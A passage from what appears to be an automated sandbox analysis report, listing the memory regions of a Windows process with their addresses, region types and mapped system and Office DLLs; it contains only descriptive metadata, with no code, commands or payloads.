0x1912b331fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912b330000" filename = "" Region: id = 507 start_va = 0x7ffb4eab0000 end_va = 0x7ffb4ead4fff monitored = 0 entry_point = 0x7ffb4eab3340 region_type = mapped_file name = "msdart.dll" filename = "\\Windows\\System32\\msdart.dll" (normalized: "c:\\windows\\system32\\msdart.dll") Region: id = 508 start_va = 0x7ffb52ac0000 end_va = 0x7ffb52ac9fff monitored = 0 entry_point = 0x7ffb52ac1830 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 509 start_va = 0x1912b340000 end_va = 0x1912b354fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oledb32r.dll" filename = "\\Program Files\\Common Files\\System\\Ole DB\\oledb32r.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\oledb32r.dll") Region: id = 510 start_va = 0x7ffb33e00000 end_va = 0x7ffb3404afff monitored = 0 entry_point = 0x7ffb33e01ca0 region_type = mapped_file name = "acecore.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\ACECORE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\acecore.dll") Region: id = 511 start_va = 0x19132220000 end_va = 0x1913621ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019132220000" filename = "" Region: id = 512 start_va = 0x5465400000 end_va = 0x54654fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005465400000" filename = "" Region: id = 513 start_va = 0x5465500000 end_va = 0x54655fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005465500000" filename = "" Region: id = 514 start_va = 0x5465600000 end_va = 0x54656fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005465600000" filename = "" Region: id = 515 start_va = 0x7ffb33d20000 end_va = 0x7ffb33df4fff monitored = 0 entry_point = 0x7ffb33d21c0c region_type = mapped_file name = "acewstr.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\1033\\ACEWSTR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\1033\\acewstr.dll") Region: id = 516 start_va = 0x1912b360000 end_va = 0x1912b36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b360000" filename = "" Region: id = 517 start_va = 0x1912b370000 end_va = 0x1912b37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b370000" filename = "" Region: id = 518 start_va = 0x19136220000 end_va = 0x1913651ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019136220000" filename = "" Region: id = 519 start_va = 0x1912b360000 end_va = 0x1912b36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b360000" filename = "" Region: id = 520 start_va = 0x19136520000 end_va = 0x1913681ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019136520000" filename = "" Region: id = 521 start_va = 0x1912b370000 end_va = 0x1912b37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b370000" filename = "" Region: id = 522 start_va = 0x19138220000 end_va = 0x1913851ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019138220000" filename = "" Region: id = 523 start_va = 0x1912b360000 end_va = 0x1912b36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b360000" filename = "" Region: id = 524 start_va = 0x19139920000 end_va = 0x19139c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019139920000" filename = "" Region: id = 525 start_va = 0x1912b370000 end_va = 0x1912b37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b370000" filename = "" Region: id = 526 start_va = 0x19139e20000 end_va = 0x1913a11ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019139e20000" filename = "" Region: id = 527 start_va = 0x1912b360000 end_va = 0x1912b36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b360000" filename = "" Region: id = 528 start_va = 0x1913ae20000 end_va = 0x1913b11ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001913ae20000" filename = "" Region: id = 529 start_va = 0x1912b370000 end_va = 0x1912b37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b370000" filename = "" Region: id = 530 start_va = 0x1913b620000 end_va = 0x1913b91ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001913b620000" filename = "" Region: id = 531 start_va = 0x7ffb4eaa0000 end_va = 0x7ffb4eaadfff monitored = 0 entry_point = 0x7ffb4eaa16f8 region_type = mapped_file name = "aceerr.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\ACEERR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\aceerr.dll") Region: id = 532 start_va = 0x7ffb4b8c0000 end_va = 0x7ffb4b8f4fff monitored = 0 entry_point = 0x7ffb4b8c1144 region_type = mapped_file name = "aceintl.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\1033\\ACEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\1033\\aceintl.dll") Region: id = 533 start_va = 0x1912b360000 end_va = 0x1912b36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b360000" filename = "" Region: id = 534 start_va = 0x1913c920000 end_va = 0x1913cc1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001913c920000" filename = "" Region: id = 535 start_va = 0x1912b370000 end_va = 0x1912b37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b370000" filename = "" Region: id = 536 start_va = 0x1913e520000 end_va = 0x1913e81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001913e520000" filename = "" Region: id = 537 start_va = 0x1912b360000 end_va = 0x1912b36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b360000" filename = "" Region: id = 538 start_va = 0x1913f620000 end_va = 0x1913f91ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001913f620000" filename = "" Region: id = 539 start_va = 0x1912b370000 end_va = 0x1912b37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b370000" filename = "" Region: id = 540 start_va = 0x19141520000 end_va = 0x1914181ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019141520000" filename = "" Region: id = 541 start_va = 0x1912b360000 end_va = 0x1912b36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b360000" filename = "" Region: id = 542 start_va = 0x19142320000 end_va = 0x1914261ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019142320000" filename = "" Region: id = 543 start_va = 0x1912b370000 end_va = 0x1912b37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b370000" filename = "" Region: id = 544 start_va = 0x19143b20000 end_va = 0x19143e1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019143b20000" filename = "" Region: id = 545 start_va = 0x1912b360000 end_va = 0x1912b36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b360000" filename = "" Region: id = 546 start_va = 0x19145b20000 end_va = 0x19145e1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019145b20000" filename = "" Region: id = 547 start_va = 0x1912b370000 end_va = 0x1912b37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b370000" filename = "" Region: id = 548 start_va = 0x19147520000 end_va = 0x1914781ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019147520000" filename = "" Region: id = 549 start_va = 0x1912b360000 end_va = 0x1912b36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b360000" filename = "" Region: id = 550 start_va = 0x19148c20000 end_va = 0x19148f1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019148c20000" filename = "" Region: id = 551 start_va = 0x1912b370000 end_va = 0x1912b37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b370000" filename = "" Region: id = 552 start_va = 0x1914aa20000 end_va = 0x1914ad1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001914aa20000" filename = "" Region: id = 553 start_va = 0x1912b360000 end_va = 0x1912b36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b360000" filename = "" Region: id = 554 start_va = 0x1914c220000 end_va = 0x1914c51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001914c220000" filename = "" Region: id = 555 start_va = 0x1912b370000 end_va = 0x1912b37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b370000" filename = "" Region: id = 556 start_va = 0x1914df20000 end_va = 0x1914e21ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001914df20000" filename = "" Region: id = 557 start_va = 0x1912b360000 end_va = 0x1912b36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b360000" filename = "" Region: id = 558 start_va = 0x1914e120000 end_va = 0x1914e41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001914e120000" filename = "" Region: id = 559 start_va = 0x1912b370000 end_va = 0x1912b37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b370000" filename = "" Region: id = 560 start_va = 0x19150520000 end_va = 0x1915081ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019150520000" filename = "" Region: id = 561 start_va = 0x1912b360000 end_va = 0x1912b36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b360000" filename = "" Region: id = 562 start_va = 0x19150d20000 end_va = 0x1915101ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019150d20000" filename = "" Region: id = 563 start_va = 0x1912b370000 end_va = 0x1912b37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b370000" filename = "" Region: id = 564 start_va = 0x19151c20000 end_va = 0x19151f1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019151c20000" filename = "" Region: id = 565 start_va = 0x1912b360000 end_va = 0x1912b36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b360000" filename = "" Region: id = 566 start_va = 0x19153020000 end_va = 0x1915331ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019153020000" filename = "" Region: id = 567 start_va = 0x7ffb33c40000 end_va = 0x7ffb33d12fff monitored = 0 entry_point = 0x7ffb33c41350 region_type = mapped_file name = "acees.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\ACEES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\acees.dll") Region: id = 568 start_va = 0x7ffb4ea90000 end_va = 0x7ffb4ea97fff monitored = 0 entry_point = 0x7ffb4ea91a98 region_type = mapped_file name = "vbajet32.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\VBAJET32.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\vbajet32.dll") Region: id = 569 start_va = 0x52410000 end_va = 0x524e1fff monitored = 0 entry_point = 0x524314e4 region_type = mapped_file name = "msvcr100.dll" filename = "\\Windows\\System32\\msvcr100.dll" (normalized: "c:\\windows\\system32\\msvcr100.dll") Region: id = 570 start_va = 0x1912b3d0000 end_va = 0x1912b44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b3d0000" filename = "" Region: id = 571 start_va = 0x7ffb3afb0000 end_va = 0x7ffb3b029fff monitored = 0 entry_point = 0x7ffb3aff2590 region_type = mapped_file name = "expsrv.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\EXPSRV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\expsrv.dll") Region: id = 572 start_va = 0x1912b370000 end_va = 0x1912b37afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "normnfd.nls" filename = "\\Windows\\System32\\normnfd.nls" (normalized: "c:\\windows\\system32\\normnfd.nls") Region: id = 573 start_va = 0x1912b380000 end_va = 0x1912b38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b380000" filename = "" Region: id = 574 start_va = 0x19153420000 end_va = 0x1915371ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019153420000" filename = "" Region: id = 575 start_va = 0x1912b3d0000 end_va = 0x1912b3dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b3d0000" filename = "" Region: id = 576 start_va = 0x1912b440000 end_va = 0x1912b44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b440000" filename = "" Region: id = 577 start_va = 0x19155720000 end_va = 0x19155a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019155720000" filename = "" Region: id = 578 start_va = 0x1912b380000 end_va = 0x1912b38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b380000" filename = "" Region: id = 579 start_va = 0x1912b3d0000 end_va = 0x1912b3dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b3d0000" filename = "" Region: id = 580 start_va = 0x19136220000 end_va = 0x1913811ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019136220000" filename = "" Region: id = 581 start_va = 0x19136220000 end_va = 0x1913811ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019136220000" filename = "" Region: id = 582 start_va = 0x1912b360000 end_va = 0x1912b36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b360000" filename = "" Region: id = 583 start_va = 0x19156420000 end_va = 0x1915671ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019156420000" filename = "" Region: id = 584 start_va = 0x1912b380000 end_va = 0x1912b38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b380000" filename = "" Region: id = 585 start_va = 0x19157020000 end_va = 0x1915731ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019157020000" filename = "" Region: id = 586 start_va = 0x1912b360000 end_va = 0x1912b36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b360000" filename = "" Region: id = 587 start_va = 0x1912b380000 end_va = 0x1912b38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b380000" filename = "" Region: id = 588 start_va = 0x19136220000 end_va = 0x1913811ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019136220000" filename = "" Region: id = 589 start_va = 0x19136220000 end_va = 0x1913811ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019136220000" filename = "" Region: id = 590 start_va = 0x1912b360000 end_va = 0x1912b36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b360000" filename = "" Region: id = 591 start_va = 0x19158f20000 end_va = 0x1915921ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019158f20000" filename = "" Region: id = 592 start_va = 0x1912b3d0000 end_va = 0x1912b3dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b3d0000" filename = "" Region: id = 593 start_va = 0x1915ad20000 end_va = 0x1915b01ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001915ad20000" filename = "" Region: id = 594 start_va = 0x1912b360000 end_va = 0x1912b36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b360000" filename = "" Region: id = 595 start_va = 0x1912b380000 end_va = 0x1912b38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b380000" filename = "" Region: id = 596 start_va = 0x1915ce20000 end_va = 0x1915d11ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001915ce20000" filename = "" Region: id = 597 start_va = 0x1912b3d0000 end_va = 0x1912b3dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b3d0000" filename = "" Region: id = 598 start_va = 0x1915d020000 end_va = 0x1915d31ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001915d020000" filename = "" Region: id = 599 start_va = 0x1912b380000 end_va = 0x1912b38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b380000" filename = "" Region: id = 600 start_va = 0x1912b360000 end_va = 0x1912b36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b360000" filename = "" Region: id = 601 start_va = 0x1915d320000 end_va = 0x1915d61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001915d320000" filename = "" Region: id = 602 start_va = 0x1912b3d0000 end_va = 0x1912b3dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b3d0000" filename = "" Region: id = 603 start_va = 0x1915e120000 end_va = 0x1915e41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001915e120000" filename = "" Region: id = 604 start_va = 0x1912b360000 end_va = 0x1912b36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b360000" filename = "" Region: id = 605 start_va = 0x5465700000 end_va = 0x54657fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005465700000" filename = "" Region: id = 606 start_va = 0x5465800000 end_va = 0x54658fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005465800000" filename = "" Region: id = 607 start_va = 0x5465900000 end_va = 0x54659fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005465900000" filename = "" Region: id = 608 start_va = 0x1912b360000 end_va = 0x1912b36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b360000" filename = "" Region: id = 609 start_va = 0x1912b380000 end_va = 0x1912b38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b380000" filename = "" Region: id = 610 start_va = 0x1915e720000 end_va = 0x1915ea1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001915e720000" filename = "" Region: id = 611 start_va = 0x1912b3d0000 end_va = 0x1912b3dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b3d0000" filename = "" Region: id = 612 start_va = 0x1915f120000 end_va = 0x1915f41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001915f120000" filename = "" Region: id = 613 start_va = 0x1912b380000 end_va = 0x1912b38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b380000" filename = "" Region: id = 614 start_va = 0x1912b3d0000 end_va = 0x1912b3dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b3d0000" filename = "" Region: id = 615 start_va = 0x1912b380000 end_va = 0x1912b38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b380000" filename = "" Region: id = 616 start_va = 0x19161020000 end_va = 0x1916131ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019161020000" filename = "" Region: id = 617 start_va = 0x1912b3e0000 end_va = 0x1912b3effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b3e0000" filename = "" Region: id = 618 start_va = 0x19162220000 end_va = 0x1916251ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019162220000" filename = "" Region: id = 619 start_va = 0x1912b380000 end_va = 0x1912b38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b380000" filename = "" Region: id = 620 start_va = 0x1912b3e0000 end_va = 0x1912b3effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b3e0000" filename = "" Region: id = 621 start_va = 0x19162a20000 end_va = 0x19162d1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019162a20000" filename = "" Region: id = 622 start_va = 0x1912b380000 end_va = 0x1912b38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b380000" filename = "" Region: id = 623 start_va = 0x1912b3e0000 end_va = 0x1912b3effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b3e0000" filename = "" Region: id = 624 start_va = 0x1912b380000 end_va = 0x1912b38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b380000" filename = "" Region: id = 625 start_va = 0x19163720000 end_va = 0x19163a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019163720000" filename = "" Region: id = 626 start_va = 0x1912b3f0000 end_va = 0x1912b3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b3f0000" filename = "" Region: id = 627 start_va = 0x19164f20000 end_va = 0x1916521ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019164f20000" filename = "" Region: id = 628 start_va = 0x1912b380000 end_va = 0x1912b38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b380000" filename = "" Region: id = 629 start_va = 0x1912b3f0000 end_va = 0x1912b3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b3f0000" filename = "" Region: id = 630 start_va = 0x19136220000 end_va = 0x1913811ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019136220000" filename = "" Region: id = 631 start_va = 0x19136220000 end_va = 0x1913811ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019136220000" filename = "" Region: id = 632 start_va = 0x7ffb51d50000 end_va = 0x7ffb51dc8fff monitored = 0 entry_point = 0x7ffb51d6fb90 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 633 start_va = 0x7ff7118d0000 end_va = 0x7ff71194dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\apppatch64\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\apppatch64\\sysmain.sdb") Region: id = 654 start_va = 0x7ffb56de0000 end_va = 0x7ffb56de6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll") Region: id = 655 start_va = 0x7ffb48b00000 end_va = 0x7ffb48d8dfff monitored = 0 entry_point = 0x7ffb48bd0f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 656 start_va = 0x1912b380000 end_va = 0x1912b380fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 657 start_va = 0x7ffb4b940000 end_va = 0x7ffb4b954fff monitored = 0 entry_point = 0x7ffb4b942dc0 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 666 start_va = 0x5465a00000 end_va = 0x5465afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005465a00000" filename = "" Region: id = 667 start_va = 0x7ffb4cfd0000 end_va = 0x7ffb4d007fff monitored = 0 entry_point = 0x7ffb4cfe8cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 668 start_va = 0x7ffb4f040000 end_va = 0x7ffb4f107fff monitored = 0 entry_point = 0x7ffb4f0813f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 669 start_va = 0x7ffb52d40000 end_va = 0x7ffb52d9bfff monitored = 0 entry_point = 0x7ffb52d56f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 670 start_va = 0x7ffb4c020000 end_va = 0x7ffb4c02afff monitored = 0 entry_point = 0x7ffb4c021d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 671 start_va = 0x7ffb54670000 end_va = 0x7ffb54677fff monitored = 0 entry_point = 0x7ffb54671ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 672 start_va = 0x7ffb51ee0000 end_va = 0x7ffb51f89fff monitored = 0 entry_point = 0x7ffb51f07910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 739 start_va = 0x5465b00000 end_va = 0x5465bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005465b00000" filename = "" Region: id = 740 start_va = 0x7ffb4cf70000 end_va = 0x7ffb4cf85fff monitored = 0 entry_point = 0x7ffb4cf719f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 741 start_va = 0x7ffb4cf50000 end_va = 0x7ffb4cf69fff monitored = 0 entry_point = 0x7ffb4cf52430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 742 start_va = 0x7ffb46310000 end_va = 0x7ffb4638ffff monitored = 0 entry_point = 0x7ffb4633d280 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 995 start_va = 0x7ffb4b410000 end_va = 0x7ffb4b419fff monitored = 0 entry_point = 0x7ffb4b4114c0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 998 start_va = 0x7ffb4be70000 end_va = 0x7ffb4bed6fff monitored = 0 entry_point = 0x7ffb4be763e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1008 start_va = 0x1912b3e0000 end_va = 0x1912b3e2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\System32\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mswsock.dll.mui") Region: id = 1009 start_va = 0x1912b400000 end_va = 0x1912b409fff monitored = 0 entry_point = 0x1912b4015c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 1010 start_va = 0x1912b410000 end_va = 0x1912b410fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\System32\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshqos.dll.mui") Region: id = 1011 start_va = 0x1912b400000 end_va = 0x1912b409fff monitored = 0 entry_point = 0x1912b4015c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 1012 start_va = 0x1912b410000 end_va = 0x1912b410fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\System32\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshqos.dll.mui") Region: id = 1013 start_va = 0x1912b400000 end_va = 0x1912b409fff monitored = 0 entry_point = 0x1912b4015c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 1014 start_va = 0x1912b410000 end_va = 0x1912b410fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\System32\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshqos.dll.mui") Region: id = 1015 start_va = 0x1912b400000 end_va = 0x1912b409fff monitored = 0 entry_point = 0x1912b4015c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 1016 start_va = 0x1912b410000 end_va = 0x1912b410fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\System32\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshqos.dll.mui") Region: id = 1017 start_va = 0x7ffb529c0000 end_va = 0x7ffb52a39fff monitored = 0 entry_point = 0x7ffb529e1a50 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 1018 start_va = 0x7ffb53d60000 end_va = 0x7ffb53f26fff monitored = 0 entry_point = 0x7ffb53dbdb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1019 start_va = 0x7ffb534f0000 end_va = 0x7ffb534fffff monitored = 0 entry_point = 0x7ffb534f56e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1020 start_va = 0x1912b400000 end_va = 0x1912b401fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912b400000" filename = "" Region: id = 1021 start_va = 0x1912b410000 end_va = 0x1912b412fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001912b410000" filename = "" Region: id = 1022 start_va = 0x7ffb46160000 end_va = 0x7ffb46173fff monitored = 0 entry_point = 0x7ffb46163710 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 1023 start_va = 